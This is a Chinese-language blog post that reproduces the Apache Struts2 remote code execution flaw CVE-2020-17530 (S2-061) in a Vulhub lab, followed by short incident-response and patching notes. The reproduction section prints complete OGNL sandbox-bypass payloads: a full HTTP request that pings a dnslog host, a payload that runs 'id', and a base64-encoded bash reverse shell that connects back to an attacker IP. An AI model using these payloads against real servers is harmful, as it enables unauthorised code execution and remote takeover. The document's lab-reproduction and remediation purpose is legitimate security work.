Struts2远程代码执行漏洞(CVE-2020-17530) 复现及排查

最新推荐文章于 2024-05-02 19:40:00 发布
最新推荐文章于 2024-05-02 19:40:00 发布
阅读量914 收藏
点赞数
分类专栏: 渗透 应急响应 文章标签: struts web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132299219
版权

目录

概述

影响版本

漏洞复现

应急排查

针对Vulhub的Docker环境场景

漏洞修复

参考链接

概述

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

CVE-2020-17530是对CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。

在特定的环境下,远程攻击者通过构造恶意的OGNL表达式,可造成任意代码执行。

影响版本

Struts 2.0.0 – Struts 2.5.25

漏洞复现

使用vulhub里的漏洞环境

1、使用dnslog探测漏洞是否存在

 
 
POST /index.action HTTP/1.1
 Host: 192.168.52.131:8080
 Content-Length: 851
 Cache-Control: max-age=0
 Upgrade-Insecure-Requests: 1
 Origin: http://192.168.52.131:8080
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfLALYDUSEsCqcvp9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Referer: http://192.168.52.131:8080/index.action
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9
 Connection: close

 ------WebKitFormBoundaryfLALYDUSEsCqcvp9
 Content-Disposition: form-data; name="id"

 %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping    vquj2m.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
 ------WebKitFormBoundaryfLALYDUSEsCqcvp9--
 

 

执行部分为:
 

 
 
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping    vquj2m.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
 

 

 

 

 2、执行命令
 

 
 
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
 

 

 

 

 
 

3、反弹shell
 

注:反弹shell涉及到管道符问题,需要要将命令进行base64编码
 

 
 
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUyLjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
 

 

 
 

 

 
 

 

 
 

应急排查
 

针对Vulhub的Docker环境场景
 

1、排查docker log日志
 

只有启动信息,无访问信息
 

 

 
 

2、排查struts2框架日志
 

一般struts2会配合log4j进行日志处理,但此环境未配置,故无日志排查
 

3、排查web访问日志
 

一般针对web类入侵,查看网站访问日志和错误日志是最高效的方式,但目前不适用此环境。
 

漏洞修复
 

避免对不受信任的用户输入使用强制OGNL评估,或/和升级到2.5.26版,可修复该漏洞。建议受影响的用户将Apache Struts框架升级至最新版本
 

参考链接
 

CVE-2020-17530:Struts2远程代码执行漏洞复现-腾讯云开发者社区-腾讯云

                

        

        

    




    

      

        

            

              
                
                  dayouziei
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
Apache Struts2远程代码执行漏洞复现CVE-2021-31805)

				
			

			

				

					0xSec
				

				

					01-12
					
					1159
					
				

			

		

		

			
				
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

			
		

	



                

              
                



	

		

			

				
					
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md

				
			

			

				

					04-12
				

			

		

		

			
				
CVE-2020-13925 Apache Kylin 远程命令执行漏洞

			
		

	



                


  
              

                


	

		

			

				
					
Struts2远程代码执行漏洞

				
			

			

				

					m0_63241485的博客
				

				

					08-16
					
					892
					
				

			

		

		

			
				
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...

			
		

	





	

		

			

				
					
Struts2 远程代码执行漏洞复现(S2-001)

				
			

			

				

					Welcome To Myon'Blog !
				

				

					03-14
					
					601
					
				

			

		

		

			
				
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。

			
		

	



		

			
		



	

		

			

				
					
CVE-2020-17530

				
			

			

				

					03-21
				

			

		

		

			
				
CVE-2020-17530
 s2-061
 POC:
 %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#

			
		

	





	

		

			

				
					
Struts2——052(CVE-2017-9805)远程代码执行漏洞复现

				
			

			

				

					Stephen Wolf
				

				

					11-23
					
					963
					
				

			

		

		

			
				
一、漏洞描述:

    2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStre...

			
		

	





	

		

			

				
					
Apache Struts2远程代码执行漏洞(S2-001)复现

				
			

			

				

					oiadkt的博客
				

				

					05-04
					
					2277
					
				

			

		

		

			
				
Apache Struts2远程代码执行漏洞(S2-001)复现

			
		

	





	

		

			

				
					
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

				
			

			

				

					weixin_67503304的博客
				

				

					08-22
					
					6916
					
				

			

		

		

			
				
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具

			
		

	





	

		

			

				
					
Struts2 S2-005 远程代码执行漏洞——漏洞复现

				
			

			

				

					weixin_42090431的博客
				

				

					12-02
					
					276
					
				

			

		

		

			
				
Apache Struts 2是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java ServletAPI,鼓励开发者采用MVC架构。缘起于Apache StrutsWebWork框架,旨在提供相对于Struts框架的增强和改进,同时保留与Struts框架类似的结构。2005年12月,WebWork宣布WebWork 2.2以Apache Struts 2的名义合并至Struts。2007年2月第一个全发布(full release)版本释出。

			
		

	





	

		

			

				
					
Struts2漏洞分析与复现合集

				
			

			

				

					未完成的歌~的博客
				

				

					08-22
					
					5971
					
				

			

		

		

			
				
原理:该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行漏洞环境搭建
https://github.com/vulhub/vulhub/tree/master/struts2/s2-001
运行以下命令进行设置

.............

			
		

	





	

		

			

				
					
jackson-CVE-2020-8840:FasterXMLjackson-databind远程代码执行漏洞

				
			

			

				

					03-08
				

			

		

		

			
				
CVE-2020-8840 FasterXML / jackson-databind远程代码执行漏洞

			
		

	





	

		

			

				
					
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md

				
			

			

				

					04-11
				

			

		

		

			
				
CVE-2020-21224 ClusterEngineV4.0 远程代码执行

			
		

	





	

		

			

				
					
网络安全风险里的威胁建模

					
最新发布

				
			

			

				

					qq_41432686的博客
				

				

					05-02
					
					566
					
				

			

		

		

			
				
网络安全的本质是攻防双方的对抗与博弈。然而,由于多种攻防之间的不对称性因素存在,使得攻击者总能在对抗过程中抢占先机。为了更好地了解潜在的威胁和缺陷,实现主动式防御,企业需要重新考虑他们的网络防护方法,而威胁建模(Threat modeling)正是网络安全武器库中关键防御武器。

			
		

	





	

		

			

				
					
网络安全之密码学技术

				
			

			

				

					缘友一世的博客
				

				

					04-29
					
					1110
					
				

			

		

		

			
				
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。

			
		

	





	

		

			

				
					
网络安全思考题

				
			

			

				

					weixin_62304542的博客
				

				

					04-27
					
					945
					
				

			

		

		

			
				
网络安全渗透思考题

			
		

	





	

		

			

				
					
网络安全(黑客)—2024自学

				
			

			

				

					dexi1113的博客
				

				

					04-16
					
					1846
					
				

			

		

		

			
				
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。

			
		

	





	

		

			

				
					
Tomact_CVE-2020-1938漏洞复现

				
			

			

				

					08-31
				

			

		

		

			
				
复现Tomact_CVE-2020-1938漏洞,可以按照以下步骤进行操作:  1. 下载POC:可以使用以下命令下载POC文件:  git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/ 2. 在攻击机上...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值